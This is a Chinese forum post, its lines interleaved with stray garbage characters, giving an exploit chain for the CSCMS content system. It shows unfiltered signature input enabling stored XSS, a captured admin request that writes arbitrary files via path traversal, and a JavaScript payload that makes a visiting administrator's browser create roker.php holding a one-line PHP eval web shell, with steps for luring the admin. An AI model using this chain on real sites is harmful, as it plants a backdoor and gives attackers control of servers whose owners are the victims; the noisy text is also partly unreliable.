|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题2 y" Q* |5 g7 a) F. E% b3 N
官网已经修补了,所以重新下了源码
+ }: \: O* T: h& c3 `- w因为 后台登入 还需要认证码 所以 注入就没看了。
- p% ^% z, ~2 n4 W存在 xss
; L7 v# ]; d; H& U- Y7 j6 E6 R% E漏洞文件 user/member/skin_edit.php* c: s7 H6 [( A) G# U" ~; b) h! p2 x
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
. M+ w& }0 d' m$ h , J4 L. ?/ @ C
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>, Y) k3 P0 V) f, J! ^8 h
% B/ |3 X) ]& C% }+ R, M) C7 i
</textarea></td></tr>" ?( }0 L- [% l2 e; f
4 s# v' V& \6 O( g2 w4 x3 G# |! @
user/do.php 8 @$ T" q, t7 I Z! Z
+ y3 c, K' s% r/ d7 F3 x( C7 T. y7 {
$ v0 Z. m+ o( k8 w4 P7 kif($op=='zl'){ //资料- S- ^9 ~. N4 g5 o/ Y
' O5 {1 T& f, t+ a. P if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 5 L1 k- G k% I( W0 T
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
; B2 m8 F" o7 U, p K; b3 w ' X) {0 ~0 Q# ~" c# q' t
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',4 U2 y/ w8 J; O9 O3 h+ P
& C% x5 ~7 P2 _8 C' L$ D" M CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'0 |: ~9 O. {- X6 T1 z
where CS_Name='".$cscms_name."'";" j! `" l1 w7 }9 R; z) e
! ]% g& A7 A# E" ^* H
if($db->query($sql)){! l3 U7 ]/ B6 {" u
, a0 j! t b! _: F# n/ ~. ^ exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);')); S0 B+ z: _: u' m& S9 H$ k% m
& M# B9 R" R# h/ G" f
}else{" `7 W# Y1 h. ?4 x6 H
! F& }- T" H$ h" x( t
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
9 ?' Z% s. j. ^ X* e. N . V8 S) c# ^) q( M6 B# Q5 l
} ^/ }- j$ Z1 U" m
( F3 h' C+ _, J( ?
1 L' V" ?/ |) k) M0 q没有 过滤导致xss产生。 h9 D; o! C; k- [& X% B
后台 看了下 很奇葩的是可以写任意格式文件。。
: C, O* l/ ~. E& G* |9 x( L抓包。。& R( l% T2 `7 h
- s1 X& f1 u! l4 X$ [; R% q* d4 G
; z$ ^! w( q" G) ]7 I本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1- k- N- f1 V$ H0 h- v1 L
: ?8 w1 U; n- ]) Z" W
Accept: text/html, application/xhtml+xml, */*
0 J% s3 j1 ]+ k |: l( ` $ v, @- G' g9 l( e
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* y( } V s! x' } , C! b% e* V q
Accept-Language: zh-CN
4 R# u' m% l$ ~ " g f7 U1 ^* r1 S
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
- G+ U) H+ j" ^8 F
/ L u9 y# A- `/ G" L$ F% i) g& T6 JContent-Type: application/x-www-form-urlencoded
, z; p; ]; x: u/ G
: S+ O, I4 n3 A* S+ Y+ pAccept-Encoding: gzip, deflate- U3 c: z* x1 ?* q) E
. f' D& w8 l8 O! g9 }
Host: 127.0.0.1- E6 [. }0 D& ~& s
- d0 D5 ]& E. NContent-Length: 38* ^& r% T7 Y% v& o: Q; w0 \$ N3 R
& k; w1 H% {9 |& d
DNT: 1" p" B! M) H# @5 a: U
4 \7 J& h- |. Y- W5 v
Connection: Keep-Alive
2 t8 C5 R: b2 E! u) S+ W1 P " h: a$ g8 G* R3 ?$ o# X) T5 O
Cache-Control: no-cache) r; e9 d$ C1 O
# U) ^+ N! T; \$ R5 _5 |! r$ W
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594& |3 f1 X U. o8 h6 \( [% E+ I" n
: f8 T8 u. ~1 Z: o3 V
3 c( N0 }+ _8 T) F7 k0 x' Kname=aaa.php&content=%3Cs%3E%3Ca%25%3E
2 m9 O3 g: y9 x3 Y# r( D
1 Y6 [8 F; t8 S( x% h+ {; k" ]1 ~6 V2 F3 a
! j! H- u8 ]* j. X4 |
于是 构造js如下。- V2 X+ \$ E6 A) K
/ d1 x6 K) }) t& _* k6 X本帖隐藏的内容<script>
S$ F7 u: Y4 y5 n9 ~0 i" y( EthisTHost = top.location.hostname;5 d1 C* G. o' v, Q {- _8 k$ G
! J, l4 ^# K0 M) j8 `6 G5 TthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";6 H7 l9 u# S$ q$ M1 z y
, n& z4 b0 S% c4 V' |2 H3 Xfunction PostSubmit(url, data, msg) {
! O9 x$ `" M2 k+ i7 y5 ] var postUrl = url;
+ h7 w$ P+ |+ p$ A+ M P1 N! w; ?6 R/ @- P- M
var postData = data; ' K" p# {% |% d; Y
var msgData = msg;
6 U' M6 m* V: H1 m/ s" w( X. w var ExportForm = document.createElement("FORM"); # B# n! G8 R/ s5 s
document.body.appendChild(ExportForm);
. ]: A% y& H( Z, W0 y6 [- f ExportForm.method = "POST"; ! x1 l' V* p' T/ a; s; O! _8 o2 b
var newElement = document.createElement("input"); * L( m( e7 d% K4 {0 D( L5 |
newElement.setAttribute("name", "name"); ; m+ w& j' ^) B, T/ b: _; F
newElement.setAttribute("type", "hidden");
" S" W [" G0 p6 s5 q2 K1 F2 { var newElement2 = document.createElement("input"); 9 ^% e' ~/ i) G$ B _' e
newElement2.setAttribute("name", "content");
; t2 I5 z& B7 g0 Z1 A9 G% g- @ newElement2.setAttribute("type", "hidden"); 4 c1 i, _. S8 O4 M
ExportForm.appendChild(newElement); 4 T' N' y6 e& l) j+ F, `
ExportForm.appendChild(newElement2); ) O: H$ ]! Z3 g5 Q, q
newElement.value = postData; : b& e# t! |; e# ~, J
newElement2.value = msgData; . B, W2 e8 x1 v2 y. S! ~, b
ExportForm.action = postUrl; $ g7 v) z5 E4 O6 g
ExportForm.submit();
. k8 T; h" O1 F! o e};: q; P# ^9 X, G5 ^# ^0 J# _! x d$ S7 k# k
7 Y2 I% P, N( ? K( [! D" k
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
, s$ G% G7 X, S4 T0 o9 f
4 C0 ^& [ Y. q# _& ^3 A</script>
6 v' c; x) R7 e! _! H7 s" L s( U9 q+ h- f. o) z
" t# G. ^; I2 X- B5 e' n: M# E
5 e3 X8 I, L7 w' ~6 Rhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入8 X: K5 k+ W6 [: n/ L
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)+ h, |* M ?; N5 K
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
0 N5 |0 c! W, I+ | |
|